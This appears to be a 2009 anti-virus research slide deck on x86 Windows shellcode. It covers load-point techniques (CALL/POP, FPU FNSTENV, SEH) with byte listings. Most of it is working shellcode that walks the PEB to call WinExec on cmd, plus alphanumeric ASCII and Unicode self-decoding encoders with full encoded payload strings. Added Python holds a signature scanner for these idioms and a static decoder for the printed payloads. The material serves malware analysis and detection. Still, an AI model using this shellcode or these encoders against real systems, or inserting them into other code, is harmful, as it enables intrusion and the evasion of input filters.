Shellgames
Peter Ferrie
Senior Anti-virus Researcher
4 February, 2009
Outside the Shell: Gaining control
- Buffer overflow
- Double-free
- Function-pointer hijack
- NULL-pointer access (rare)
- And others
Peter Ferrie, Microsoft Corporation
Outside the Shell: Types of shellcode
- Stack-based
- Heap-based
- Other memory locations
Inside the Shell: Finding the load-point
- CALL->POP
  - Often to an earlier memory location, to avoid zeroes in the code
- FPU
  - Many FPU instructions store EIP in the Last Instruction Pointer field
  - All except FNINIT, FNCLEX, FLDCW, FNSTCW, FNSTSW, FNSTENV, FLDENV, FN/XSAVE, F[X]RSTOR
- SEH
  - Write to a known "safe" memory location
  - Raise exception
  - Exception address is the load-point
- Don't care
CALL->POP Method
  l1: EB xx              JMP SHORT l3
  l2: 5x                 POP reg32          ; reg32 = address of the byte after the CALL
      ...
  l3: E8 xx FF FF FF     CALL NEAR l2       ; backward call, so the displacement holds no zero bytes

Alternative for larger shellcode (> 129 bytes), since a short JMP reaches at most 127 bytes forward:
  l1: EB 02              JMP SHORT l3
  l2: EB 05              JMP SHORT l4
  l3: E8 F9 FF FF FF     CALL NEAR l2
  l4: 5x                 POP reg32          ; reg32 = address of l4
      ...
FPU Method
  l1: [DB E3]            [FNINIT] (optional)
      Dx xx              [FPU instruction]                ; its own address is recorded in the FPU Last Instruction Pointer
      D9 74 24 F4        FNSTENV BYTE PTR SS:[ESP - 0C]   ; the 28-byte environment puts that pointer (offset 0C) at [ESP]
      5x                 POP reg32                        ; reg32 = address of the FPU instruction
      ...
FPU Method (cont.)
Metasploit framework calls these "safe":
- d9 c0 - c7 - fld st(0), st(i)
- d9 c8 - cf - fxch st(0), st(i)
- d9 d0 - fnop
- d9 e1 - fabs st(0)
- d9 e5 - fxam st(0)
- d9 e8 - fld1 st(0)
- d9 e9 - fldl2t st(0)
- d9 ea - fldl2e st(0)
- d9 eb - fldpi st(0)
- d9 ec - fldlg2 st(0)
- d9 ed - fldln2 st(0)
- d9 ee - fldz st(0)
FPU Method (cont.)
Metasploit framework calls these "safe":
- d9 f6 - fdecstp
- d9 f7 - fincstp
- da c0 - c7 - fcmovb st(0), st(i) (p2+)
- da c8 - cf - fcmove st(0), st(i) (p2+)
- da d0 - d7 - fcmovbe st(0), st(i) (p2+)
- da d8 - df - fcmovu st(0), st(i) (p2+)
- db c0 - c7 - fcmovnb st(0), st(i) (p2+)
- db c8 - cf - fcmovne st(0), st(i) (p2+)
- db d0 - d7 - fcmovnbe st(0), st(i) (p2+)
- db d8 - df - fcmovnu st(0), st(i) (p2+)
- dd c0 - c7 - ffree st(i)
FPU Method (cont.)
There are others:
- d9 e0 - fchs st(0)
- d9 e4 - ftst st(0)
- dd c8 - cf - fxch st(i), st(0)
- df c0 - c7 - ffree st(i)
- df c8 - cf - fxch st(i), st(0)
FPU Method (cont.)
Accessing the Last Instruction Pointer field
- FSTENV
  - Uses 28 bytes of memory
- FSAVE
  - Uses 108 bytes of memory
  - Not supported by Metasploit framework
- FXSAVE
  - Uses 512 bytes of memory
  - Requires oword-alignment
  - Not supported by Metasploit framework
SEH Method
  33 C0                  XOR EAX, EAX
  64 8B 78 30            MOV EDI, DWORD PTR FS:[EAX + 30]   ; PEB
  8B 7F 10               MOV EDI, DWORD PTR DS:[EDI + 10]   ; PEB->ProcessParameters
  83 C7 78               ADD EDI, +78                       ; the known "safe" (writable) location
  57                     PUSH EDI                           ; handler
  57                     PUSH EDI                           ; next
  64 89 20               MOV DWORD PTR FS:[EAX], ESP        ; install the SEH record
  B8 58 58 5C 59         MOV EAX, 595C5858
  AB                     STOS DWORD PTR ES:[EDI]
  B8 8B 40 0C 40         MOV EAX, 400C408B
  AB                     STOS DWORD PTR ES:[EDI]
  B8 40 FF E0 00         MOV EAX, 00E0FF40
  AB                     STOS DWORD PTR ES:[EDI]
  0F 0B                  UD2                                ; raise the exception

The three stored dwords are the handler itself: 58 58 5C 59 8B 40 0C 40 40 FF E0 = POP EAX; POP EAX; POP ESP; POP ECX; MOV EAX, [EAX + 0C]; INC EAX; INC EAX; JMP EAX. The second POP leaves EAX pointing at the EXCEPTION_RECORD, whose ExceptionAddress field (offset 0C) is the address of the UD2; adding its two bytes gives the load-point, and execution continues there with EAX holding it.
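A defender-side scan for the three load-point idioms just shown (CALL->POP, FPU/FNSTENV and the FS:[EAX]-installed SEH record); this is added example code, not from the talk. The sample buffers are constructed from the slides' byte patterns with the placeholders filled in (xx displacements chosen to fit, 5x = 5E POP ESI, FLDZ as the "safe" FPU instruction), and the SEH sample is the listing above.

```python
"""Flag the three load-point (GetPC) idioms from the slides in a byte buffer."""
from typing import List, Tuple

# Metasploit's "safe" FPU instructions (slides 7-8) plus the "others" (slide 9),
# as (opcode, lowest second byte, highest second byte) ranges.
SAFE_FPU = [
    (0xD9, 0xC0, 0xCF), (0xD9, 0xD0, 0xD0), (0xD9, 0xE0, 0xE1),
    (0xD9, 0xE4, 0xE5), (0xD9, 0xE8, 0xEE), (0xD9, 0xF6, 0xF7),
    (0xDA, 0xC0, 0xDF), (0xDB, 0xC0, 0xDF),
    (0xDD, 0xC0, 0xCF), (0xDF, 0xC0, 0xCF),
]
FNSTENV_ESP_0C = bytes.fromhex("D97424F4")   # FNSTENV BYTE PTR SS:[ESP - 0C]
MOV_FS_EAX_ESP = bytes.fromhex("648920")     # MOV DWORD PTR FS:[EAX], ESP
UD2 = bytes.fromhex("0F0B")

# Constructed samples laid out as on the slides (not the talk's own bytes).
SAMPLES = {
    "call_pop":       bytes.fromhex("EB01 5E E8FAFFFFFF"),          # JMP l3 / POP ESI / CALL l2
    "call_pop_large": bytes.fromhex("EB02 EB05 E8F9FFFFFF 5E"),     # second form from slide 5
    "fpu":            bytes.fromhex("D9EE D97424F4 5E"),            # FLDZ / FNSTENV [ESP-0C] / POP ESI
    "seh":            bytes.fromhex(
        "33C0 648B7830 8B7F10 83C778 57 57 648920"
        " B858585C59 AB B88B400C40 AB B840FFE000 AB 0F0B"),          # slide 11 verbatim
}


def is_pop_r32(b: int) -> bool:
    return 0x58 <= b <= 0x5F


def is_safe_fpu(op: int, second: int) -> bool:
    return any(op == o and lo <= second <= hi for o, lo, hi in SAFE_FPU)


def _lands_on_pop(buf: bytes, tgt: int) -> bool:
    """True if tgt is a POP r32, allowing one JMP SHORT in between (second CALL->POP form)."""
    if not 0 <= tgt < len(buf):
        return False
    if buf[tgt] == 0xEB and tgt + 2 <= len(buf):
        tgt = tgt + 2 + int.from_bytes(buf[tgt + 1:tgt + 2], "little", signed=True)
        if not 0 <= tgt < len(buf):
            return False
    return is_pop_r32(buf[tgt])


def find_getpc(buf: bytes) -> List[Tuple[int, str]]:
    """Return (offset, idiom) for every load-point idiom found in buf."""
    hits = []
    n = len(buf)
    for i in range(n):
        # CALL->POP: E8 rel32 whose target (inside the buffer) is a POP r32.
        if buf[i] == 0xE8 and i + 5 <= n:
            rel = int.from_bytes(buf[i + 1:i + 5], "little", signed=True)
            if _lands_on_pop(buf, i + 5 + rel):
                hits.append((i, "call->pop"))
        # FPU: a "safe" FPU instruction, then FNSTENV [ESP-0C], then POP r32.
        if (i + 7 <= n and is_safe_fpu(buf[i], buf[i + 1])
                and buf[i + 2:i + 6] == FNSTENV_ESP_0C and is_pop_r32(buf[i + 6])):
            hits.append((i, "fpu"))
        # SEH: a record installed through FS:[EAX] with a UD2 shortly after it.
        if buf[i:i + 3] == MOV_FS_EAX_ESP and UD2 in buf[i + 3:i + 48]:
            hits.append((i, "seh"))
    return hits


if __name__ == "__main__":
    for name, sample in SAMPLES.items():
        print(f"{name}: {find_getpc(sample)}")
```

The SEH check keys on the exact FS:[EAX] form from the slide; real samples vary the register and the faulting instruction, so treat each rule as one signature rather than a complete detector.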
Don't Care Method
- Most commonly ESP-relative
- Stack-based shellcode
- ESP used as direct memory pointer
- Usually not encoded
Example Shellcode: Plain binary
  64 67 A1 30 00         MOV EAX, DWORD PTR FS:[0030]               ; PEB
  8B 78 0C               MOV EDI, DWORD PTR DS:[EAX + 0C]           ; PEB->Ldr
  8B 77 1C               MOV ESI, DWORD PTR DS:[EDI + 1C]           ; InInitializationOrderModuleList
  AD                     LODS DWORD PTR DS:[ESI]                    ; EAX = second entry of the list
  8B 78 08               MOV EDI, DWORD PTR DS:[EAX + 08]           ; its DllBase (kernel32 on XP/Vista-era Windows)
  8B 77 3C               MOV ESI, DWORD PTR DS:[EDI + 3C]           ; e_lfanew
  8B 74 3E 78            MOV ESI, DWORD PTR DS:[EDI + ESI + 78]     ; export directory RVA
  8B 5C 3E 20            MOV EBX, DWORD PTR DS:[EDI + ESI + 20]     ; AddressOfNames RVA
  03 DF                  ADD EBX, EDI
  33 ED                  XOR EBP, EBP
  l1: 45                 INC EBP
  8B 14 AB               MOV EDX, DWORD PTR SS:[EBP*4 + EBX]        ; next name RVA
  81 3C 3A 57 69 6E 45   CMP DWORD PTR DS:[EDI + EDX], "EniW"       ; "WinE" of WinExec
  75 F3                  JNE l1
  8B 74 3E 1C            MOV ESI, DWORD PTR DS:[EDI + ESI + 1C]     ; AddressOfFunctions RVA
  03 F7                  ADD ESI, EDI
  03 3C AE               ADD EDI, DWORD PTR DS:[EBP*4 + ESI]        ; name index reused as function index (no ordinal table)
  68 63 6D 64 00         PUSH "dmc"                                 ; "cmd\0"
  8B F4                  MOV ESI, ESP
  6A 00                  PUSH +00                                   ; uCmdShow
  56                     PUSH ESI                                   ; lpCmdLine
  FF D7                  CALL NEAR PTR EDI                          ; WinExec
Example Shellcode: Plain binary
  68 63 6D 64 00         PUSH "dmc"                                 ; "cmd\0" on the stack
  8B FC                  MOV EDI, ESP
  33 ED                  XOR EBP, EBP
  55                     PUSH EBP                                   ; uCmdShow = 0
  57                     PUSH EDI                                   ; lpCmdLine, pushed before EDI is reused
  64 8B 7D 30            MOV EDI, DWORD PTR FS:[EBP + 30]           ; PEB
  8B 7F 0C               MOV EDI, DWORD PTR DS:[EDI + 0C]           ; Ldr
  8B 77 1C               MOV ESI, DWORD PTR DS:[EDI + 1C]
  AD                     LODS DWORD PTR DS:[ESI]
  8B 78 08               MOV EDI, DWORD PTR DS:[EAX + 08]           ; kernel32 base
  8B 77 3C               MOV ESI, DWORD PTR DS:[EDI + 3C]
  8B 74 3E 78            MOV ESI, DWORD PTR DS:[EDI + ESI + 78]
  8B 5C 3E 20            MOV EBX, DWORD PTR DS:[EDI + ESI + 20]
  03 DF                  ADD EBX, EDI
  l1: 45                 INC EBP
  8B 14 AB               MOV EDX, DWORD PTR SS:[EBP*4 + EBX]
  81 3C 3A 57 69 6E 45   CMP DWORD PTR DS:[EDI + EDX], "EniW"
  75 F3                  JNE l1
  8B 74 3E 1C            MOV ESI, DWORD PTR DS:[EDI + ESI + 1C]
  03 F7                  ADD ESI, EDI
  03 3C AE               ADD EDI, DWORD PTR DS:[EBP*4 + ESI]
  FF D7                  CALL NEAR PTR EDI                          ; WinExec("cmd", 0)
Same lookup as before, but the WinExec arguments are pushed first (while ESP still points at the string) and the zeroed EBP doubles as the base for FS:[EBP + 30], avoiding the 67 A1 absolute form.
Example Shellcode: Binary without zeroes
  68 78 63 6D 64         PUSH "dmcx"                                ; "xcmd" on the stack
  8B FC                  MOV EDI, ESP
  47                     INC EDI                                    ; EDI -> "cmd"
  33 ED                  XOR EBP, EBP
  55                     PUSH EBP                                   ; uCmdShow = 0
  57                     PUSH EDI                                   ; lpCmdLine
  64 8B 7D 30            MOV EDI, DWORD PTR FS:[EBP + 30]           ; PEB
  8B 7F 0C               MOV EDI, DWORD PTR DS:[EDI + 0C]
  8B 77 1C               MOV ESI, DWORD PTR DS:[EDI + 1C]
  AD                     LODS DWORD PTR DS:[ESI]
  8B 78 08               MOV EDI, DWORD PTR DS:[EAX + 08]
  8B 77 3C               MOV ESI, DWORD PTR DS:[EDI + 3C]
  8B 74 3E 78            MOV ESI, DWORD PTR DS:[EDI + ESI + 78]
  8B 5C 3E 20            MOV EBX, DWORD PTR DS:[EDI + ESI + 20]
  03 DF                  ADD EBX, EDI
  l1: 45                 INC EBP
  8B 14 AB               MOV EDX, DWORD PTR SS:[EBP*4 + EBX]
  81 3C 3A 57 69 6E 45   CMP DWORD PTR DS:[EDI + EDX], "EniW"
  75 F3                  JNE l1
  8B 74 3E 1C            MOV ESI, DWORD PTR DS:[EDI + ESI + 1C]
  03 F7                  ADD ESI, EDI
  03 3C AE               ADD EDI, DWORD PTR DS:[EBP*4 + ESI]
  FF D7                  CALL NEAR PTR EDI
The only zero byte in the previous version was the terminator of "cmd"; pushing "xcmd" and skipping the 'x' with INC EDI removes it from the code, at the price of relying on whatever follows the string on the stack to terminate it.
Example Shellcode: Alphanumeric ASCII, Mixed-case
  56                     PUSH ESI
  33 34 64               XOR ESI, DWORD PTR SS:[ESP]               ; ESI = 0
  4E                     DEC ESI                                   ; ESI = FFFFFFFF
  6A 41                  PUSH +41
  58                     POP EAX
  34 65                  XOR AL, 65                                ; EAX = 24
  50                     PUSH EAX
  33 34 64               XOR ESI, DWORD PTR SS:[ESP]               ; ESI = FFFFFFDB
  l1: 46                 INC ESI
  6B 44 71 65 30         IMUL EAX, DWORD PTR DS:[ESI*2 + ECX + 65], +30
  32 44 71 66            XOR AL, BYTE PTR DS:[ESI*2 + ECX + 66]
  30 44 31 41            XOR BYTE PTR DS:[ESI + ECX + 41], AL
  75 45                  [JNE l1]                                  ; 45 [encoded F0]
ECX points at the start of the decoder (the register assumed known on entry). The read pointer advances two bytes per iteration and the write pointer one: output byte i is (input[2i] * 30h) XOR input[2i+1], XORed in place over input[i], all counted from the JNE displacement at offset 1Dh. The first byte written is therefore that displacement, which the stored 45h turns into F0h = JNE l1; the loop ends when a written byte comes out as zero.
Example Shellcode: Alphanumeric ASCII, Mixed-case
Decoder:
V34dNjAX4eP34dFkDqe02Dqf0D1AuEE
Our shellcode:
PvJOGBHAP0PwHIBWPMCKPGPLCJHCP1PJCLBGPqHHGoPnGoCKBpAMPjPKElP
cCLGEHAPWCwHCAKPjBFBABFBbBzDcCuP3PQAoPHEEPsAMCsPcDGA5BCGmB
oGmA7CXEHA1BpGNENDGPW
Example Shellcode: Alphanumeric ASCII, Lower-case
  6A 33                  PUSH +33
  31 34 64               XOR DWORD PTR SS:[ESP], ESI
  33 34 64               XOR ESI, DWORD PTR SS:[ESP]               ; ESI = 33, whatever it held before
  6A 71                  PUSH +71
  33 34 64               XOR ESI, DWORD PTR SS:[ESP]               ; ESI = 42
  6A 6E                  PUSH +6E
  33 34 64               XOR ESI, DWORD PTR SS:[ESP]               ; ESI = 2C
  31 34 31               XOR DWORD PTR DS:[ESI + ECX], ESI         ; fix up the four loop bytes that are not lower-case
  31 71 31               XOR DWORD PTR DS:[ECX + 31], ESI          ;   (offsets 2C, 31, 34 and 36, each XOR 2C)
  31 71 34               XOR DWORD PTR DS:[ECX + 34], ESI
  31 71 36               XOR DWORD PTR DS:[ECX + 36], ESI
  6A 33                  PUSH +33
  31 34 64               XOR DWORD PTR SS:[ESP], ESI
  33 34 64               XOR ESI, DWORD PTR SS:[ESP]               ; ESI = 33
  6A 30                  PUSH +30
  33 34 64               XOR ESI, DWORD PTR SS:[ESP]               ; ESI = 03
  l1: 6B 44 71 34 30     [IMUL EAX, DWORD PTR DS:[ESI*2 + ECX + 34], +30]   ; stored as 6B 68 71 34 30
  32 44 71 35            [XOR AL, BYTE PTR DS:[ESI*2 + ECX + 35]]           ; stored as 32 68 71 35
  46                     [INC ESI]                                          ; stored as 6A
  30 44 31 36            [XOR BYTE PTR DS:[ESI + ECX + 36], AL]             ; stored as 30 68 31 36
  75 35                  [JNE l1]                                           ; 35 [encoded F0]
Same IMUL-by-30h scheme as the mixed-case decoder, counted from the JNE displacement at offset 3Ah; the first iteration rewrites the stored 35h into F0h = JNE l1.
Example Shellcode: Alphanumeric ASCII, Lower-case
Decoder:
j314d34djq34djn34d1411q11q41q6j314d34dj034dkhq402hq5j0h16u55
Our shellcode:
a6en228n2qrbdy1w0bdy160nno8o11093l6g1n8o2m2o6nok02206o7k4p129l
0u827w574w1k2k0921110w2x513t1r200s0h57012n5n155r0b136l2s1l264r5h
0v7p0nnm3p0w
Example Shellcode: Alphanumeric ASCII, Upper-case
  37 * 16                AAA (repeated 16h = 22 times)             ; padding that places l1 at offset 2D
  51                     PUSH ECX
  5A                     POP EDX                                   ; EDX = ECX = start of the code
  56                     PUSH ESI
  54                     PUSH ESP
  58                     POP EAX                                   ; EAX = ESP
  33 30                  XOR ESI, DWORD PTR DS:[EAX]               ; ESI = 0
  56                     PUSH ESI
  58                     POP EAX                                   ; EAX = 0
  34 41                  XOR AL, 41
  50                     PUSH EAX                                  ; 41 is kept on the stack for the loop
  30 41 33               XOR BYTE PTR DS:[ECX + 33], AL            ; fix-up: 51 ^ 41 = 10 (IMUL immediate)
  48                     DEC EAX
  48                     DEC EAX                                   ; AL = 3F
  30 41 30               XOR BYTE PTR DS:[ECX + 30], AL            ; fix-up: 54 ^ 3F = 6B (IMUL opcode)
  30 41 42               XOR BYTE PTR DS:[ECX + 42], AL            ; fix-up: 4A ^ 3F = 75 (JNE opcode)
  l1: 41                 INC ECX
  41                     INC ECX
  42                     INC EDX
  54 41 41 51            [IMUL EAX, DWORD PTR DS:[ECX + 41], +10]  ; stored bytes; executes as 6B 41 41 10
  32 41 42               XOR AL, BYTE PTR DS:[ECX + 42]
  32 42 42               XOR AL, BYTE PTR DS:[EDX + 42]
  30 42 42               XOR BYTE PTR DS:[EDX + 42], AL
  58                     POP EAX
  50                     PUSH EAX                                  ; AL = 41 again
  38 41 43               CMP BYTE PTR DS:[ECX + 43], AL            ; stop when the byte after the pair is 'A'
  4A 4A                  [JNE l1]                                  ; executes as 75 4A
  49                     [encoded E9]                              ; first write: (4A * 10) ^ 49 = E9 = JNE l1
Each iteration advances ECX by two and EDX by one, then writes (first * 10h) XOR second of the pair at ECX + 41h/42h over the byte at EDX + 42h; the stored displacement 4Ah is the first byte rewritten.
Example Shellcode: Alphanumeric ASCII, Upper-case
Decoder:
7777777777777777777777QZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0
BBXP8ACJJI
IMUL 10 method
Example Shellcode: Alphanumeric ASCII, Upper-case (improved)
  56                     PUSH ESI
  54                     PUSH ESP
  5A                     POP EDX                                   ; EDX -> the saved ESI
  33 32                  XOR ESI, DWORD PTR DS:[EDX]               ; ESI = 0
  58                     POP EAX
  56                     PUSH ESI
  58                     POP EAX                                   ; EAX = 0
  48                     DEC EAX
  34 50                  XOR AL, 50
  34 43                  XOR AL, 43                                ; EAX = FFFFFFEC
  50                     PUSH EAX                                  ; lands in the slot EDX points to
  56                     PUSH ESI
  58                     POP EAX                                   ; EAX = 0
  33 32                  XOR ESI, DWORD PTR DS:[EDX]               ; ESI = FFFFFFEC
  56                     PUSH ESI
  5A                     POP EDX                                   ; EDX = FFFFFFEC
  34 31                  XOR AL, 31
  30 44 31 34            XOR BYTE PTR DS:[ESI + ECX + 34], AL      ; fix-up at offset 20: 5A ^ 31 = 6B (IMUL)
  30 44 31 41            XOR BYTE PTR DS:[ESI + ECX + 41], AL      ; fix-up at offset 2D: 44 ^ 31 = 75 (JNE)
  l1: 42                 INC EDX
  46                     INC ESI
  5A 44 51 54 30         [IMUL EAX, DWORD PTR DS:[EDX*2 + ECX + 54], +30]
  32 44 51 55            XOR AL, BYTE PTR DS:[EDX*2 + ECX + 55]
  30 44 31 41            XOR BYTE PTR DS:[ESI + ECX + 41], AL
  44 33                  [JNE l1]                                  ; 4C [encoded EF]
Same IMUL-by-30h scheme as the mixed-case decoder, counted from the JNE displacement at offset 2Eh: the first write turns the stored 33h into EFh = JNE l1 using the following 4Ch.
Example Shellcode: Alphanumeric ASCII, Upper-case (improved)
Decoder:
VTZ32XVXH4P4CPVX32VZ410D140D1AFBZDQT02DQU0D1AD3L
Our shellcode:
AO5N2K5N0112500J0B5K0F2MOO5N0H08510G1N5NMOLNMN5I7A1A6O064
Q13351E5C2A4Z5A1KLK69KLMP182Z5O3U096P2I0J500BLMNO15321UKN0L0
2KL0W5H511GLP1S5LNE0A
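Static emulation of the IMUL-by-30h decoders shown above (mixed-case, lower-case and improved upper-case), run over the decoder + "Our shellcode" strings the talk prints; this is added analysis code, not the talk's. It assumes what the ESI/EDX offsets encode: ECX pointed at the first byte of the decoder when it ran, and the loop's first write hits the JNE displacement at offset 1Dh, 3Ah or 2Eh respectively.

```python
"""Static decoding of the IMUL-30h alphanumeric decoders (ASCII mixed-, lower- and upper-case)."""

# Decoder + "Our shellcode" strings exactly as printed on the slides, paired with the
# offset of the JNE displacement byte, which is the first byte the loop rewrites.
SAMPLES = {
    "ascii_mixed": (
        "V34dNjAX4eP34dFkDqe02Dqf0D1AuEE"
        "PvJOGBHAP0PwHIBWPMCKPGPLCJHCP1PJCLBGPqHHGoPnGoCKBpAMPjPKElP"
        "cCLGEHAPWCwHCAKPjBFBABFBbBzDcCuP3PQAoPHEEPsAMCsPcDGA5BCGmB"
        "oGmA7CXEHA1BpGNENDGPW",
        0x1D,
    ),
    "ascii_lower": (
        "j314d34djq34djn34d1411q11q41q6j314d34dj034dkhq402hq5j0h16u55"
        "a6en228n2qrbdy1w0bdy160nno8o11093l6g1n8o2m2o6nok02206o7k4p129l"
        "0u827w574w1k2k0921110w2x513t1r200s0h57012n5n155r0b136l2s1l264r5h"
        "0v7p0nnm3p0w",
        0x3A,
    ),
    "ascii_upper_improved": (
        "VTZ32XVXH4P4CPVX32VZ410D140D1AFBZDQT02DQU0D1AD3L"
        "AO5N2K5N0112500J0B5K0F2MOO5N0H08510G1N5NMOLNMN5I7A1A6O064"
        "Q13351E5C2A4Z5A1KLK69KLMP182Z5O3U096P2I0J500BLMNO15321UKN0L0"
        "2KL0W5H511GLP1S5LNE0A",
        0x2E,
    ),
}


def decode_imul30(buf: bytes, disp_index: int) -> bytes:
    """Emulate: IMUL EAX, [read], 30h ; XOR AL, [read + 1] ; XOR [write], AL ; JNE.

    Iteration k reads bytes disp_index + 2k and disp_index + 2k + 1 and XORs the result
    into byte disp_index + k.  The read pointer outruns the write pointer, so no byte is
    read after it has been rewritten.  The XOR to memory sets ZF when the written byte
    is zero, which is what makes the JNE fall through.  Returns every byte written.
    """
    data = bytearray(buf)
    out = bytearray()
    k = 0
    while True:
        r = disp_index + 2 * k      # ESI*2 + ECX + disp (ECX = start of the decoder)
        w = disp_index + k          # ESI   + ECX + disp
        if r + 1 >= len(data):
            raise ValueError("input exhausted before a zero byte ended the loop")
        al = ((data[r] * 0x30) & 0xFF) ^ data[r + 1]   # only the low byte of the IMUL matters
        data[w] ^= al
        out.append(data[w])
        if data[w] == 0:
            return bytes(out)
        k += 1


def decode_sample(name: str) -> bytes:
    """Decode one of the slide samples; byte 0 is the rewritten JNE displacement."""
    text, disp = SAMPLES[name]
    return decode_imul30(text.encode("ascii"), disp)


if __name__ == "__main__":
    for name in SAMPLES:
        out = decode_sample(name)
        print(f"{name}: JNE displacement -> {out[0]:02X}, "
              f"payload ({len(out) - 1} bytes): {out[1:].hex()}")
```

All three strings decode to the same zero-free payload, which opens with 33 FF 64 8B 7F 30 (XOR EDI, EDI / MOV EDI, FS:[EDI + 30]), the PEB walk of the plain-binary examples.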
Example Shellcode: Alphanumeric Unicode, Mixed-case
(every code byte is followed by a 00; "+ NOP" marks the 00 41 00 = ADD BYTE PTR DS:[ECX + 00], AL that absorbs that padding once AL is zero)
  34 00 * 27             XOR AL, 00 (repeated 27h = 39 times)
  6A 00                  PUSH +00
  58 00 41 00            POP EAX + NOP                             ; EAX = 0
  51 00 41 00            PUSH ECX + NOP
  44 00 41 00            INC ESP + NOP
  5A 00 41 00            POP EDX + NOP
  42 00 41 00            INC EDX + NOP
  52 00 41 00            PUSH EDX + NOP
  4C 00 41 00            DEC ESP + NOP
  59 00 41 00            POP ECX + NOP
  49 00 41 00            DEC ECX + NOP
  51 00 41 00            PUSH ECX + NOP
  49 00 41 00            DEC ECX + NOP
  51 00 41 00            PUSH ECX + NOP
  49 00 41 00            DEC ECX + NOP
  68 00 41 00 41         PUSH 41004100
  00 41 00               ADD BYTE PTR DS:[ECX + 00], AL (NOP)
  5A                     POP EDX                                   ; EDX = 41004100, DH = 41
  00 31                  ADD BYTE PTR DS:[ECX], DH                 ; fix-up: add 41 to a stored byte
  00 41 00               ADD BYTE PTR DS:[ECX + 00], AL (NOP)
  49 00 41 00            DEC ECX + NOP
  49 00 41 00            DEC ECX + NOP
  4A                     DEC EDX                                   ; EDX = 410040FF, DH = 40
  00 31                  ADD BYTE PTR DS:[ECX], DH
  00 31                  ADD BYTE PTR DS:[ECX], DH
  00 41 00               ADD BYTE PTR DS:[ECX + 00], AL (NOP)
  49 00 41 00            DEC ECX + NOP
  49 00 41 00            DEC ECX + NOP
Example Shellcode: Alphanumeric Unicode, Mixed-case (cont.)
  42 00 41 00            INC EDX + NOP
  42 00 41 00            INC EDX + NOP
  42                     INC EDX                                   ; EDX = 41004102, DL = 02
  00 51 00               ADD BYTE PTR DS:[ECX + 00], DL
  49                     DEC ECX
  00 31                  ADD BYTE PTR DS:[ECX], DH
  00 41 00               ADD BYTE PTR DS:[ECX + 00], AL (NOP)
  49                     DEC ECX
  00 51 00               ADD BYTE PTR DS:[ECX + 00], DL
  49 00 41 00            DEC ECX + NOP
  49                     DEC ECX
  00 51 00               ADD BYTE PTR DS:[ECX + 00], DL
  49                     DEC ECX
  00 31                  ADD BYTE PTR DS:[ECX], DH
  00 31                  ADD BYTE PTR DS:[ECX], DH
  00 31                  ADD BYTE PTR DS:[ECX], DH
  00 41 00               ADD BYTE PTR DS:[ECX + 00], AL (NOP)
  49 00 41 00            DEC ECX + NOP
  4A                     DEC EDX                                   ; DL = 01
  00 51 00               ADD BYTE PTR DS:[ECX + 00], DL
  59 00 41 00            POP ECX + NOP
  5A                     POP EDX
  00 42 00               ADD BYTE PTR DS:[EDX + 00], AL
  l1: 41                 INC ECX
  00 42 00               ADD BYTE PTR DS:[EDX + 00], AL
  41                     INC ECX
  00 42 00               ADD BYTE PTR DS:[EDX + 00], AL
  41                     INC ECX
Example Shellcode: Alphanumeric Unicode, Mixed-case (cont.)
  00 42 00               ADD BYTE PTR DS:[EDX + 00], AL
  41                     INC ECX
  00 42 00               ADD BYTE PTR DS:[EDX + 00], AL
  6B 00 4D 00 41 00 47 00 42 00 39 00 75 00 34 00 4A 00 42 00
                         stored bytes of the decoding loop; once the ADD-to-memory fix-ups above have run they execute as:
                         [IMUL EAX, DWORD PTR DS:[ECX], +10]
                         [ADD AL, BYTE PTR DS:[ECX + 02]]
                         [MOV BYTE PTR DS:[EDX], AL]
                         INC EDX
                         [CMP DWORD PTR DS:[ECX], +41]
                         [JNE l1]
                         XOR AL, 00
                         [encoded E2]
Example Shellcode: Alphanumeric Unicode, Mixed-case
Decoder:
444444444444444444444444444444444444444jXAQADAZABARALAYAIAQAIA
QAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMA
GB9u4JB
Our shellcode:
OCKOBDDKCONPDKCOLLDKCGMLFMDKCHLHDKCGOLDKCDONCHDKQLONMPL
CIOOCJMOUDKMDFKCQOLOJQGBIBNPECEKCDKCDONMLLCKGLCOLFNOCJMQ
EBHCHBCBMBDDKKDOVQEQFKOIGA
Example Shellcode: Alphanumeric Unicode, Lower-case
None is known to exist
Example Shellcode: Alphanumeric Unicode, Upper-case
("+ NOP" again marks the 00 41 00 = ADD BYTE PTR DS:[ECX + 00], AL that absorbs the Unicode padding)
  34 00 * 0E             XOR AL, 00 (repeated 0Eh = 14 times)
  51 00 41 00            PUSH ECX + NOP
  44 00 41 00            INC ESP + NOP
  58 00 41 00            POP EAX + NOP
  5A 00 41 00            POP EDX + NOP
  50 00 41 00            PUSH EAX + NOP
  33 00                  XOR EAX, DWORD PTR DS:[EAX]               ; here the 00 is the ModRM byte
  51 00 41 00            PUSH ECX + NOP
  44 00 41 00            INC ESP + NOP
  5A 00 41 00            POP EDX + NOP
  42 00 41 00            INC EDX + NOP
  52 00 41 00            PUSH EDX + NOP
  4C 00 41 00            DEC ESP + NOP
  59 00 41 00            POP ECX + NOP
  49 00 41 00            DEC ECX + NOP
  51 00 41 00            PUSH ECX + NOP
  49 00 41 00            DEC ECX + NOP
  51 00 41 00            PUSH ECX + NOP
  50 00 41 00            PUSH EAX + NOP
  35 00 41 00 41         XOR EAX, 41004100
  00 41 00               ADD BYTE PTR DS:[ECX + 00], AL (NOP)
  50 00 41 00            PUSH EAX + NOP
  5A                     POP EDX                                   ; EDX = 41004100, DH = 41
  00 31                  ADD BYTE PTR DS:[ECX], DH
  00 41 00               ADD BYTE PTR DS:[ECX + 00], AL (NOP)
  49                     DEC ECX
  00 31                  ADD BYTE PTR DS:[ECX], DH
  00 41 00               ADD BYTE PTR DS:[ECX + 00], AL (NOP)
Example Shellcode: Alphanumeric Unicode, Upper-case (cont.)
  49 00 41 00            DEC ECX + NOP
  49 00 41 00            DEC ECX + NOP
  4A                     DEC EDX                                   ; EDX = 410040FF, DH = 40
  00 31                  ADD BYTE PTR DS:[ECX], DH
  00 31                  ADD BYTE PTR DS:[ECX], DH
  00 41 00               ADD BYTE PTR DS:[ECX + 00], AL (NOP)
  49 00 41 00            DEC ECX + NOP
  49 00 41 00            DEC ECX + NOP
  58 00 41 00            POP EAX + NOP
  35 00 38 00 41         XOR EAX, 41003800
  00 41 00               ADD BYTE PTR DS:[ECX + 00], AL (NOP)
  50 00 41 00            PUSH EAX + NOP
  5A 00 41 00            POP EDX + NOP
  42 00 41 00            INC EDX + NOP
  42                     INC EDX                                   ; EDX = 41003802, DL = 02, DH = 38
  00 51 00               ADD BYTE PTR DS:[ECX + 00], DL
  49                     DEC ECX
